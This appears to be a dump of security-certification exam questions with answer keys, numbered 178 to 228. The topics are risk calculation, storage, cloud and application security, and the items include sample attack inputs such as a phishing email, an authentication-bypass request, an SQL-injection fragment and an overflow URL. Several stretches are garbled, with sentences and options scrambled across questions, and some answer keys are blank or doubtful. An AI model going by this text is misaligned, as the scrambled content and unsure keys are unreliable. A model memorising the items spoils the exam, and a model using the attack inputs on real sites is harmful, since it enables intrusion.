The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to
current industry trends. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security
incidents. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Every user receives a popup warning about this policy upon login.
The SIEM system produces a report of USB violations on a monthly basis, yet violations continue to occur. Which of the following preventative controls would MOST
effectively mitigate the logical risks associated with the use of USB storage devices?

A. Revise the corporate policy to include possible termination as a result of violations
B. Increase the frequency and distribution of the USB violations report
C. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense
D. Implement group policy objects

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 179
A user is suspected of engaging in potentially illegal activities. Law enforcement has requested that the user continue to operate on the network as normal.
However, they would like to have a copy of any communications from the user involving certain key terms. Additionally, the law enforcement agency has requested
that the user's ongoing communication be retained in the user's account for future investigations. Which of the following will BEST meet the goals of law
enforcement?

A. Begin a chain-of-custody on for the user's communication. Next, place a legal hold on the user's email account.
B. Perform an e-discover using the applicable search terms. Next, back up the user's email for a future investigation.
C. Place a legal hold on the user's email account. Next, perform e-discovery searches to collect applicable emails.
D. Perform a back up of the user's email account. Next, export the applicable emails that match the search terms.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 180
A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the
outsourced systems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Which of the
following is critical to ensure the successful management of system security concerns between the two organizations?

A. ISA
B. BIA
C. MOU
D. SOA
E. BPA

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 181
A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. Which of the following security
technologies would BEST meet their requirements? (Select TWO).

A. NIPS
B. HSM
C. HIPS
D. NIDS
E. WAF

Correct Answer: CE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 182
Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows:

Delivered-To: customer@example.com
Received: by 10.14.120.205 Mon, 1 Nov 2010 11:15:24 -0700 (PDT)
Received: by 10.231.31.193 Mon, 01 Nov 2010 11:15:23 -0700 (PDT)
Return-Path: <IT@company.com>
Received: from 127.0.0.1 for <customer@example.com>; Mon, 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.com>)
Received: by smtpex.example.com (SMTP READY) with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500
Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov 2010 13:15:14 -0500
From: Company <IT@Company.com>
To: "customer@example.com" <customer@example.com>
Date: Mon, 1 Nov 2010 13:15:11 -0500
Subject: New Insurance Application
Thread-Topic: New Insurance Application

Please download and install software from the site below to maintain full access to your account.
www.examplesite.com

Additional information: The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11. The network's subnet is 192.168.2.0/25.

Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO).

A. Identify the origination point for malicious activity on the unauthorized mail server.
B. Block port 25 on the firewall for all unauthorized mail servers.
C. Disable open relay functionality.
D. Shut down the SMTP service on the unauthorized mail server.
E. Enable STARTTLS on the spam filter.

Correct Answer: BD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 183
An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data
leakage. Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000. The web
filtering solution will cost the organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event after implementing
the web filtering solution?

A. $0
B. $7,500
C. $10,000
D. $12,500
E. $15,000

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 184
Company policy requires that all unsupported operating systems be removed from the network. The security administrator is using a combination of network based
tools to identify such systems for the purpose of disconnecting them from the network. Which of the following tools, or outputs from the tools in use, can be used
to help the security administrator make an approximate determination of the operating system in use on the local company network? (Select THREE).

A. Passive banner grabbing
B. Password cracker
C. http://www.company.org/documents_private/index.php?search=string#&topic=windows&tcp=packet%20capture&cookie=wokdjwalkjcnie61lkasdf2aliser4
D. 443/tcp open http
E. dig host.company.com
F. 09:18:16.262743 IP (tos 0x0, ttl 64, id 9870, offset 0, flags [none], proto TCP (6), length 40) 192.168.1.3.1051 > 10.46.3.7.80: Flags [none], cksum 0x1800
(correct), win 512, length 0
G. Nmap

Correct Answer: AF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 185
An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a
source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the
following is the administrator attempting to prevent?

A. BGP route hijacking attacks
B. Bogon IP network traffic
C. IP spoofing attacks
D. Man-in-the-middle attacks
E. Amplified DDoS attacks

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 186
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal
items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal
activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this
activity occurring in the future?

A. Background checks
B. Job rotation
C. Least privilege
D. Employee termination procedures

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 187
A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request:

POST http://www.example.com/resources/NewBankAccount HTTP/1.1
Content-type: application/json
{
"account": [
{ "creditAccount":"Credit Card Rewards account"}
{ "salesLeadRef":"www.example.com/badcontent/exploitme.exe"}
],
"customer": [
{ "name":"Joe Citizen"}
{ "custRef":"3153151"}
]
}

The banking website responds with:

HTTP/1.1 200 OK
{
"newAccountDetails": [
{ "cardNumber":"1234123412341234"}
{ "cardExpiry":"2020-12-31"}
{ "cardCVV":"909"}
],
"marketingCookieTracker":"JSESSIONID=000000001"
"returnCode":"Account added successfully"
}

Which of the following are security weaknesses in this example? (Select TWO).

A. Missing input validation on some fields
B. Vulnerable to SQL injection
C. Sensitive details communicated in clear-text
D. Vulnerable to XSS
E. Vulnerable to malware file uploads
F. JSON/REST is not as secure as XML

Correct Answer: AC
Section: (none)
Explanation

Explanation/Reference:

QUESTION 188
ODBC access to a database on a network-connected host is required. The host does not have a security mechanism to authenticate the incoming ODBC connection,
and the application requires that the connection have read/write permissions. In order to further secure the data, a nonstandard configuration would need to be
implemented. The information in the database is not sensitive, but was not readily accessible prior to the implementation of the ODBC connection. Which of the
following actions should be taken by the security analyst?

A. Accept the risk in order to keep the system within the company's standard security configuration.
B. Explain the risks to the data owner and aid in the decision to accept the risk versus choosing a nonstandard solution.
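The two weaknesses the key picks out in QUESTION 187 (unvalidated input, card data returned over cleartext HTTP) are the kind of thing a review script can flag mechanically. The Python below is an added example, not part of the exam dump; it walks a request/response pair and reports the transport, the request field carrying a URL to an executable, and every response field holding card data. The sample JSON is constructed from the exchange above with the missing commas supplied so that it parses, and the key list, regexes and function names are my own assumptions.

```python
import json
import re
from typing import Any, Callable, List

# Response keys that must never reach a client in the clear (assumed list,
# modelled on the fields in the response above).
SENSITIVE_KEYS = {"cardnumber", "cardcvv", "cardexpiry"}
PAN_RE = re.compile(r"^\d{13,19}$")                       # bare card-number shape
EXECUTABLE_URL_RE = re.compile(r"\.(exe|dll|scr|bat|ps1)$", re.IGNORECASE)

# Constructed sample exchange (commas added so it is valid JSON).
SAMPLE_URL = "http://www.example.com/resources/NewBankAccount"
SAMPLE_REQUEST = json.dumps({
    "account": [{"creditAccount": "Credit Card Rewards account"},
                {"salesLeadRef": "www.example.com/badcontent/exploitme.exe"}],
    "customer": [{"name": "Joe Citizen"}, {"custRef": "3153151"}],
})
SAMPLE_RESPONSE = json.dumps({
    "newAccountDetails": [{"cardNumber": "1234123412341234"},
                          {"cardExpiry": "2020-12-31"},
                          {"cardCVV": "909"}],
    "marketingCookieTracker": "JSESSIONID=000000001",
    "returnCode": "Account added successfully",
})


def find_fields(node: Any, predicate: Callable[[str, Any], bool], path: str = "$") -> List[str]:
    """Walk a decoded JSON document; return JSONPath-like locations of every
    key/value pair for which `predicate(key, value)` holds."""
    hits: List[str] = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if predicate(key, value):
                hits.append(child)
            hits.extend(find_fields(value, predicate, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_fields(item, predicate, f"{path}[{i}]"))
    return hits


def is_sensitive(key: str, value: Any) -> bool:
    """Known card-data key, or any string shaped like a primary account number."""
    return key.lower() in SENSITIVE_KEYS or (isinstance(value, str) and bool(PAN_RE.match(value)))


def is_executable_url(key: str, value: Any) -> bool:
    """Free-text field smuggling a link to an executable: input the server should reject."""
    return isinstance(value, str) and bool(EXECUTABLE_URL_RE.search(value))


def review_exchange(url: str, request_body: str, response_body: str) -> List[str]:
    """Return findings for one request/response pair, most severe transport issue first."""
    findings: List[str] = []
    if url.lower().startswith("http://"):
        findings.append("transport: request sent over cleartext HTTP")
    findings += [f"input: {p}" for p in find_fields(json.loads(request_body), is_executable_url)]
    findings += [f"exposure: {p}" for p in find_fields(json.loads(response_body), is_sensitive)]
    return findings


if __name__ == "__main__":
    for finding in review_exchange(SAMPLE_URL, SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print(finding)
```

Run against the sample it reports the cleartext transport, the salesLeadRef field, and the three card fields; pointing it at captured proxy traffic for the real application is the same call with different bodies.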

C. Secure the data despite the need to use a security control or solution that is not within company standards.
D. Do not allow the connection to be made to avoid unnecessary risk and avoid deviating from the standard security configuration.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 189
A company decides to purchase commercially available software packages. This can introduce new security risks to the network. Which of the following is the
BEST description of why this is true?

A. Commercially available software packages are typically well known and widely available. Information concerning vulnerabilities and viable attack patterns are
never revealed by the developer to avoid lawsuits.
B. Commercially available software packages are not widespread and are only available in limited areas. Information concerning vulnerabilities is often ignored by
business managers.
C. Commercially available software packages are well known and widely available. Information concerning vulnerabilities and viable attack patterns are always
shared within the
D. Commercially available software packages are often widely available. Information concerning vulnerabilities is often kept internal to the company that
developed the software.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 190
Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO).

A. Synchronous copy of data
B. RAID configuration
C. Data de-duplication

which will be required to host official business and public access. Patch the web application E. Port scanning F. Which of the following would be the MOST effective at preventing the "post your comment" field from being exploited? A. and private industry to ensure the city provides due care in considering all project factors prior to building its new WAN? . but feels this project has an increased complexity as a result of the mixed business / public use and the critical infrastructure it will provide. Install HIDS on the server D. Storage pool space allocation E. Filter metacharacters C. LUN masking/mapping G. Which of the following should the project manager release to the public. The project manager has experience with enterprise IT projects. It is also anticipated that the city's emergency and first response communication systems will be required to operate across the same network. Update the blog page to HTTPS B. Perform client side input validation Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 192 A project manager working for a large city government is required to plan and build a WAN.D. resulting in cross-site scripting attacks against customers reading the blog. academia. Port mapping Correct Answer: FG Section: (none) Explanation Explanation/Reference: QUESTION 191 It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited.

A. RFP D.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass? A. Remove all of the post data and change the request to /login. Remove the txtPassword post data and change alreadyLoggedIn from false to true D.1 Host: comptia. FCoE D. RFQ Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 193 An administrator is implementing a new network-based storage device. the administrator would like the data in transit's integrity to be the most important concern. Remove the txtUsername and txtPassword post data and toggle submit from true to false Correct Answer: C Section: (none) Explanation Explanation/Reference: . SMB B. NDA B. Which of the following protocols meets these needs by implementing either AES. iSCSI Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 194 Ann is testing the robustness of a marketing website through an intercepting proxy.aspx from POST to GET B. NFS C. In selecting a storage protocol. RFI C.CMAC or HMAC-SHA256 to sign data? A. She has intercepted the following HTTP request: POST /login.aspx HTTP/1. Attempt to brute force all usernames and passwords using a password cracker C.

QUESTION 195
A security manager looked at various logs while investigating a recent security breach in the data center from an external source. Each log below was collected from various security devices compiled from a report through the company's security information and event management server.

Logs:

Log 1:
Feb 5 23:55:37.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.2.5.81 3 packets

Log 2:
HTTP://www.company.com/index.php?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Log 3:
Security Error Alert
Event ID 50: The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client

Log 4:
Encoder oe = new OracleEncoder ();
String query = "Select user_id FROM user_data WHERE user_name = ` " + oe.encode ( req.getParameter("userID") ) + " ` and user_password = ` " + oe.

Vulnerabilities
Buffer overflow
SQL injection
ACL
XSS

Which of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO).

A. Log 1
B. Log 2
C. Log 3
D. Log 4
E. Buffer overflow
F. ACL
G. XSS
H. SQL injection

Correct Answer: BE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 196
A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally developed. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability, stability, and performance. Which of the following would provide the MOST thorough testing and satisfy the CEO's requirements?

A. Sign a MOU with a marketing firm to preserve the company reputation and use in-house resources for random testing.
B. Sign a BPA with a small software consulting firm and use the firm to perform Black box testing and address all findings.
C. Sign a NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings.
D. Use the most qualified and senior developers on the project to perform a variety of White box testing and code reviews.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 197 DRAG DROP
Company A has experienced external attacks on their network and wants to minimize the attacks from reoccurring. Modify the network diagram to prevent SQL injections, XSS attacks, smurf attacks, e-mail spam, downloaded malware, viruses and ping attacks. The company can spend a MAXIMUM of $50,000 USD. A cost list for each item is listed below:

1. Anti-Virus Server - $10,000
2. Firewall - $15,000
3. Load Balanced Server - $10,000
4. NIDS/NIPS - $10,000
5. Packet Analyzer - $5,000
6. Patch Server - $15,000
7. Proxy Server - $20,000
8. Router - $10,000
9. Spam Filter - $5,000
10. Traffic Shaper - $20,000
11. Web Application Firewall - $10,000

Instructions: Not all placeholders in the diagram need to be filled and items can only be used once. If you place an object on the network diagram, you can remove it by clicking the (x) in the upper right-hand of the object.

A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 198
A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO).

A. Use AES in Electronic Codebook mode
B. Use RC4 with Fixed IV generation
C. Use RC4 in Cipher Block Chaining mode
D. Use AES with cipher text padding
E. Use RC4 with a nonce generated IV
F. Use AES in Counter mode

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 199
An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure. Which of the following is the MOST accurate statement?

A. Agile and Waterfall approaches have the same effective level of security posture. They both need similar amounts of security effort at the same phases of development.
B. Agile development is fundamentally less secure than Waterfall due to the lack of formal up-front design and inability to perform security reviews.
C. Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years.
D. Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 200
An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management software application. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?

A. Meet the two key VPs and request a signature on the original assessment.
B. Include specific case studies from other organizations in an updated report.
C. Schedule a meeting with key human resource application stakeholders.
D. Craft an RFP to begin finding a new human resource application.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 201 DRAG DROP
A manufacturer is planning to build a segregated network. There are requirements to segregate development and test infrastructure from production and the need to support multiple entry points into the network depending on the service being accessed. There are also strict rules in place to only permit user access from within the same zone. Currently, the following access requirements have been identified:

1. Developers have the ability to perform technical validation of development applications.
2. End users have the ability to access internal web applications.
3. Third-party vendors have the ability to support applications.

In order to meet segregation and access requirements, drag and drop the appropriate network zone that the user would be accessing and the access mechanism to meet the above criteria. Options may be used once or not at all. All placeholders must be filled.

A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 202
The following has been discovered in an internally developed application:

Error - Memory allocated but not freed:
char *myBuffer = malloc(BUFFER_SIZE);
if (myBuffer != NULL) {
*myBuffer = STRING_WELCOME_MESSAGE;
printf("Welcome to: %s\n", myBuffer);
}
exit(0);

Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO).

A. Static code analysis
B. Memory dumping
C. Manual code review
D. Application sandboxing
E. Penetration testing
F. Black box testing

Correct Answer: AC
Section: (none)
Explanation

Explanation/Reference:

QUESTION 203
A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the security architect? (Select TWO).

A. Perform penetration testing over the HR solution to identify technical vulnerabilities
B. Perform a security risk assessment with recommended solutions to close off high-rated risks
C. Secure code review of the HR solution to identify security gaps that could be exploited
D. Perform access control testing to ensure that privileges have been configured correctly
E. Determine if the information security standards have been complied with by the project

Correct Answer: BE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 204
A company has a difficult time communicating between the security engineers, application developers, and sales staff. The sales staff tends to overpromise the application deliverables. The security engineers and application developers are falling behind schedule. Which of the following should be done to solve this?

A. Allow the sales staff to shadow the developers and engineers to see how their sales impact the deliverables.
B. Allow the security engineering team to do application development so they understand why it takes so long.
C. Allow the application developers to attend a sales conference so they understand how business is done.
D. Allow the sales staff to learn application programming and security engineering so they understand the whole lifecycle.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 205
A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in the company. The programmers are not on good terms with the security team and do not want to be distracted with security issues while they are working on a major project. Which of the following is the BEST time to make them address security issues in the project?

A. In the middle of the project
B. At the end of the project
C. At the inception of the project
D. At the time they request

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 206
A port in a fibre channel switch failed, causing a costly downtime on the company's primary website. Which of the following is the MOST likely cause of the downtime?

A. The web server iSCSI initiator was down.
B. The web server was not multipathed.
C. The SAN replication to the backup site failed.
D. The SAN snapshots were not up-to-date.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 207
A company has adopted a BYOD program. The company would like to protect confidential information. However, it has been decided that when an employee leaves, the company will not completely wipe the personal device. Which of the following would MOST likely help the company maintain security when employees leave?

A. Require cloud storage on corporate servers and disable access upon termination
B. Whitelist access to only non-confidential information
C. Utilize an MDM solution with containerization
D. Require that devices not have local storage

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 208
A system administrator has just installed a new Linux distribution. The distribution is configured to be "secure out of the box". The system administrator cannot make updates to certain system files and services. Each time changes are attempted, they are denied and a system error is generated. Which of the following troubleshooting steps should the security administrator suggest?

A. Review settings in the SELinux configuration files
B. Reset root permissions on systemd files
C. Perform all administrative actions while logged in as root
D. Disable any firewall software before making changes

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 209
A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concerned about the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of using presence technology?

A. Insider threat
B. Network reconnaissance
C. Physical security
D. Industrial espionage

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 210
A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period and consequently have the following requirements:

Requirement 1 Ensure their server infrastructure operating systems are at their latest patch levels
Requirement 2 Test the behavior between the application and database
Requirement 3 Ensure that customer data can not be exfiltrated

Which of the following is the BEST solution to meet the above requirements?

A. Penetration test, perform social engineering and run a vulnerability scanner
B. Perform dynamic code analysis, penetration test and run a vulnerability scanner
C. Conduct network analysis, dynamic code analysis, and static code analysis
D. Run a protocol analyzer perform static code analysis and vulnerability assessment

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 211
A critical system audit shows that the payroll system is not meeting security policy due to missing OS security patches. Upon further review, it appears that the system is not being patched at all. The vendor states that the system is only supported on the current OS patch level. Which of the following compensating controls should be used to mitigate the vulnerability of missing OS patches on this system?

A. Isolate the system on a secure network to limit its contact with other systems
B. Implement an application layer firewall to protect the payroll system interface
C. Monitor the system's security log for unauthorized access to the payroll application
D. Perform reconciliation of all payroll transactions on a daily basis

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 212
A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS.

The first quote requires a $10,000 one-time fee, annual cost of $6 per workstation, and a 10% annual support fee based on the number of workstations.
The second quote requires a $15,000 one-time fee, an annual cost of $5 per workstation, and a 12% annual fee based on the number of workstations.
The third quote has no one-time fee, an annual cost of $8 per workstation, and a 15% annual fee based on the number of workstations.

Which solution should the company select if the contract is only valid for three years?

A. First quote
B. Second quote
C. Third quote
D. Accept the risk

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 213
A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Two vendor proposals have been received:

Vendor A: product-based solution which can be purchased by the pharmaceutical company. Capital expenses to cover central log collectors, correlators, storage and management consoles expected to be $150,000. Operational expenses are expected to be a 0.5 full time employee (FTE) to manage the solution, and 1 full time employee to respond to incidents per year. Internal employee costs are averaged to be $80,000 per year per FTE.

Vendor B: managed service-based solution which can be the outsourcer for the pharmaceutical company's needs. Bundled offering expected to be $100,000 per year. Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.5 FTE per year.

Based on calculating TCO of the two vendor proposals over a 5 year period, which of the following options is MOST accurate?

A. Based on cost alone, having an outsourced solution appears cheaper.
B. Based on cost alone, having an outsourced solution appears to be more expensive.
C. Based on cost alone, having a purchased product solution appears cheaper.
D. Based on cost alone, both outsourced and in-sourced solutions appear to be the same.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 214
A company has noticed recently that its corporate information has ended up on an online forum. An investigation has identified that internal employees are sharing confidential corporate information on a daily basis. Which of the following are the MOST effective security controls that can be implemented to stop the above problem? (Select TWO).

A. Implement a URL filter to block the online forum
B. Implement NIDS on the desktop and DMZ networks
C. Security awareness compliance training for all employees
D. Implement DLP on the desktop, email gateway, and web proxies
E. Review of security policies and procedures

Correct Answer: CD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 215
The network administrator at an enterprise reported a large data leak. One compromised server was used to aggregate data from several critical application servers and send it out to the Internet using HTTPS. Upon investigation, there have been no user logins over the previous week and the endpoint protection software is not reporting any issues. Which of the following BEST provides insight into where the compromised server collected the information?

A. Review the flow data against each server's baseline communications profile.
B. Configure the server logs to collect unusual activity including failed logins and restarted services.
C. Correlate data loss prevention logs for anomalous communications from the server.
D. Setup a packet capture on the firewall to collect all of the server communications.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 216 DRAG DROP
IT staff within a company often conduct remote desktop sharing sessions with vendors to troubleshoot vendor product-related issues. Drag and drop the following security controls to match the associated security concern. Options may be used once or not at all.

A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

Vendors were authenticating directly to the retailer's AD servers. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 218 ABC Corporation uses multiple security zones to protect systems and information. C. but the smaller company's main applications were created in-house. A regression test should be performed on the in-house software to determine security risks associated with the software. Maintain a separate virtual switch for each security zone and ensure VM hosts bind to only the correct virtual NIC(s). D. The firewall rule was needed for an internal application that was developed. The smaller company has been very profitable. Each zone has different VM administrators. An ROI calculation should be performed to determine which company's application should be used. D. Ensure hypervisor layer firewalling between all VM hosts regardless of security zone. and an improper firewall rule allowed pivoting from the AD server to the DMZ where credit card servers were kept. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone? A. The retailer determined that because the vendors were . C. A security assessment should be performed to establish the risks of integration or co. which presents risk. B. Organize VM hosts into containers based on security zone and restrict access using an ACL.existence. B.QUESTION 217 A large company is preparing to merge with a smaller company. and all of the VM hosts are part of a consolidated VM infrastructure. A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed. Require multi-factor authentication when accessing the console at the physical VM host. The retailer had gone through an audit and had been presented with a potential problem on their network. 
Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 219 A well-known retailer has experienced a massive credit card breach. Which of the following actions should the large company's security administrator take in preparation for the merger? A.

Which of the following is a technical control that the security administrator should implement next to reduce malware infection? . To prove to the retailer the monetary value of this risk. Quantitative Risk Analysis D.required to have site to site VPN's no other security action was taken. Initiate a core dump of the application E. Use fuzzing techniques to examine application inputs B. Run nmap to attach to application memory C. Qualitative Risk Analysis Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 220 A security administrator is assessing a new application. The application uses an API that is supposed to encrypt text strings that are stored in memory. the company implements technical measures to disable external storage. A cost/benefit analysis C. How might the administrator test that the strings are indeed encrypted in memory? A. which of the following type of calculations is needed? A. Additionally. Use a packet analyzer to inspect the strings D. Use an HTTP interceptor to capture the text strings Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 221 A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. which blocks access to malicious web sites where malware files can be downloaded. Residual Risk calculation B. The company deploys an enterprise antivirus system as well as a web content filter.

A full-disk hardware-based encryption product with a low-level boot protection and authentication D. B. A partition-based software encryption product with a low-level boot protection and authentication B. The security administrator at the company has uncovered a breach in data confidentiality. C.000 end points. Deploy a network access control system with a persistent agent. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 222 A company that must comply with regulations is searching for a laptop encryption product to use for its 40. Company B is not in the same industry as company A and the two are not competitors. D. A file-based encryption product using profiles to target areas on the file system to encrypt Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 223 A company provides on-demand cloud computing resources for a sensitive project. Block cloud-based storage software on the company network. A container-based encryption product that allows the end users to select which files to encrypt C.A. The product must meet regulations but also be flexible enough to minimize overhead and support in regards to password resets and lockouts. Which of the following has MOST likely occurred? . Sensitive data from customer A was found on a hidden directory within the VM of company B. Which of the following implementations would BEST meet the needs? A. Implement an Acceptable Use Policy which addresses malware downloads.factor authentication for customer access to the administrative website. The company implements a fully virtualized datacenter and terminal server access with two. Enforce mandatory security awareness training for all employees and contractors.

Which of the following implementations addresses the distributed login with centralized authentication and has wide compatibility among SaaS vendors? A. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 224 After the install process. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data. After the restore. An employee with administrative access to the virtual guests was able to dump the guest memory onto a mapped disk. a software application executed an online activation process. A stolen two factor token was used to move data from one virtual guest to another host on the same network segment. password replication and shared accounts are not acceptable. Install a read-only Active Directory server in the corporate DMZ for federation. the specialized application no longer works. Establish a cloud-based authentication service that supports SAML. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 225 Company XYZ finds itself using more cloud-based business tools. D. Security is important to the company. Correct Answer: A Section: (none) Explanation Explanation/Reference: . D. The application is unable to perform remote attestation due to blocked ports. After a few months. The hash key summary of hardware and installed software no longer match. A hypervisor server was left un-patched and an attacker was able to use a resource exhaustion attack to gain unauthorized access. The binary files used by the application have been modified by malware. Which of the following is the MOST likely cause of the problem? A. as a result. and password management is becoming onerous. Implement a new Diameter authentication server with read-only attestation.A. C. Allow external connections to the existing corporate RADIUS server. B. A backup image of the system was restored on a newer revision of the same brand and model device. 
The restored image backup was encrypted with the wrong key. D. B. B. C. the system experienced a hardware failure. C.

Increased customer data confidentiality C. Latency Correct Answer: A Section: (none) Explanation Explanation/Reference: . Increased customer data availability B. Increased security through data integrity Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 227 Due to cost and implementation time pressures. high volume database application that required a high degree of data confidentiality and data availability? (Select THREE). Both hosts will be connected to a shared iSCSI storage solution. Which of the following is the hosting company MOST likely trying to achieve? A. The new host hardware and operating system will be different from the first host.QUESTION 226 A small company hosting multiple virtualized client servers on a single host is considering adding a new host to create a cluster. A. Multipath B. Increased security through provisioning D. Zoning and LUN security C. Block level transfer of data D. File level encryption D. but the underlying virtualization technology will be compatible. a security architect has allowed a NAS to be used instead of a SAN for a non-critical. Which of the following would make a NAS unsuitable for a business critical. Broadcast storms C. low volume database. File level transfer of data B.

QUESTION 228
A small customer-focused bank that has implemented least privilege principles is concerned about the possibility of branch staff unintentionally aiding fraud in their day-to-day interactions with customers. Bank staff have been encouraged to build friendships with customers to make the banking experience feel more personal. The security and risk team have decided that a policy needs to be implemented across all branches to address the risk. Which of the following BEST addresses the security and risk team's concerns?

A. Information disclosure policy
B. Awareness training
